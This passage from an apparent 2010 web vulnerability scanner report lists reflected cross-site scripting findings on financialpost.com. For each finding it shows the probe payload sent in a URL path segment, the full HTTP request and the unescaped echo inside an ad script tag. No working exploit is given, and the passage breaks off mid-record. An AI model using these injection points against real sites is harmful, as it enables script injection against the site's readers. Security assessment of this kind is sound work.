Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44222


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/b393c';95d66bbad15/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=b393c';95d66bbad15;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66179315?">
...[SNIP]...

1.232. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8854'%3b3c5e10ffaf8 was submitted in the REST URL parameter 1. This input was echoed as a8854';3c5e10ffaf8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opiniona8854'%3b3c5e10ffaf8/columnists/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43512


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opiniona8854';3c5e10ffaf8/columnists/jonathan-chevreau;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opiniona8854';3c5e10ffaf8;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65118957?
...[SNIP]...

1.233. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca10'%3bd81b1ae580f was submitted in the REST URL parameter 2. This input was echoed as 1ca10';d81b1ae580f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists1ca10'%3bd81b1ae580f/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37632


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists1ca10';d81b1ae580f/jonathan-chevreau;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists1ca10';d81b1ae580f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=60808406?">
...[SNIP]...

1.234. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jonathan-chevreau.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1e72'%3bc945c59c0e9 was submitted in the REST URL parameter 3. This input was echoed as f1e72';c945c59c0e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/f1e72'%3bc945c59c0e9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/f1e72';c945c59c0e9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=f1e72';c945c59c0e9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66901991?">
...[SNIP]...

1.235. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d26'%3b3b9f28c8209 was submitted in the REST URL parameter 1. This input was echoed as c8d26';3b9f28c8209 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionc8d26'%3b3b9f28c8209/columnists/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44282


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionc8d26';3b9f28c8209/columnists/peter-foster;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionc8d26';3b9f28c8209;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98951316?">
...[SNIP]...

1.236. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71174'%3b881fe5fc1ca was submitted in the REST URL parameter 2. This input was echoed as 71174';881fe5fc1ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists71174'%3b881fe5fc1ca/peter-foster.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37582


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists71174';881fe5fc1ca/peter-foster;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists71174';881fe5fc1ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32185690?">
...[SNIP]...

1.237. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/peter-foster.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7ce7'%3b6e16cbc7aac was submitted in the REST URL parameter 3. This input was echoed as f7ce7';6e16cbc7aac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/f7ce7'%3b6e16cbc7aac HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/f7ce7';6e16cbc7aac/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=f7ce7';6e16cbc7aac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=46235504?">
...[SNIP]...

1.238. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c9f'%3bcdf561736ea was submitted in the REST URL parameter 1. This input was echoed as c0c9f';cdf561736ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionc0c9f'%3bcdf561736ea/columnists/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43502


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionc0c9f';cdf561736ea/columnists/terence-corcoran;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionc0c9f';cdf561736ea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49307214?"
...[SNIP]...

1.239. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6c6'%3bb941a57f648 was submitted in the REST URL parameter 2. This input was echoed as 8e6c6';b941a57f648 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists8e6c6'%3bb941a57f648/terence-corcoran.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43466


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists8e6c6';b941a57f648/terence-corcoran;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists8e6c6';b941a57f648;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44994617?">
...[SNIP]...

1.240. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/terence-corcoran.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ea8'%3b6fc2681cae2 was submitted in the REST URL parameter 3. This input was echoed as 79ea8';6fc2681cae2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/79ea8'%3b6fc2681cae2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/79ea8';6fc2681cae2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=79ea8';6fc2681cae2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96826146?">
...[SNIP]...

1.241. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1008f'%3b2d6e85acc6d was submitted in the REST URL parameter 1. This input was echoed as 1008f';2d6e85acc6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion1008f'%3b2d6e85acc6d/columnists/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion1008f';2d6e85acc6d/columnists/william-hanley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion1008f';2d6e85acc6d;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20197904?">
...[SNIP]...

1.242. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8cb'%3b2ecc1657740 was submitted in the REST URL parameter 2. This input was echoed as ae8cb';2ecc1657740 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsae8cb'%3b2ecc1657740/william-hanley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43445


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsae8cb';2ecc1657740/william-hanley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsae8cb';2ecc1657740;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32871669?">
...[SNIP]...

1.243. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/william-hanley.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf85'%3b041ad7667b4 was submitted in the REST URL parameter 3. This input was echoed as 3cf85';041ad7667b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/3cf85'%3b041ad7667b4 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/3cf85';041ad7667b4/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=3cf85';041ad7667b4;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58312868?">
...[SNIP]...

1.244. http://www.financialpost.com/personal-finance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84eb2'%3b2bb55a25061 was submitted in the REST URL parameter 1. This input was echoed as 84eb2';2bb55a25061 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance84eb2'%3b2bb55a25061/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43309


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance84eb2';2bb55a25061/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance84eb2';2bb55a25061;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13558922?">
...[SNIP]...

1.245. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1558b'%3bef88a93e159 was submitted in the REST URL parameter 1. This input was echoed as 1558b';ef88a93e159 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

